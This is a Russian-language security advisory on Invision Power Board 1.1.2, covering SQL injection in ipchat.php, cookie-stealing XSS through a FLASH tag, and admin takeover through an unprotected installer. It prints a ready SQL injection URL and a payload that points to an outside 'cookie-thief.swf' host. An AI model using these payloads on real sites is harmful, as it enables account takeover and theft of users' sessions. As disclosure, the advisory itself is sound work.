Несколько уязвимостей в форуме Invision Power Board

Дата публикации:
17.07.2003
Дата изменения:
17.10.2006
Всего просмотров:
4210
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Раскрытие важных данных
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Invision Power Board 1.x
Описание: Несколько уязвимостей в проверке правильности входных данных обнаружено в Invision Power Board. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение.

1. SQl инъекция в 'ipchat.php':

http://localhost/ibo/ipchat.php?password=1&username=9x%2527+union+sel ect+%25271%2527,%2527c4ca4238a0b923820dcc509a6f75849b%2527,%2527admin%2527,1%252f*+

2. XSS в 'Post.php'.

Удаленный пользователь может вставить специально обработанный FLASH тэг внутри HTML кода, чтобы выполнить произвольный HTML код в браузере пользователя, просматривающего это сообщение. Пример:

[FLASH=2,2]http://anotherhost.ext/cookie-thief.swf[/FLASH]
2. Также сообщается, что если отсутствует installer-lockfile (install.lock) файл на целеовй системе, то удаленный пользователь может вызвать файл "sm_install.php", чтобы получить привилегии администратора.

Уязвимость обнаружена в Invision Power Board 1.1.2

Для устранения уязвимости, установите обновленную версию программы, которую можно скачать отсюда:

http://www.invisionboard.com/downloads/chat.zip

Ссылки: Invision Power Board v1.1.2

или введите имя

CAPTCHA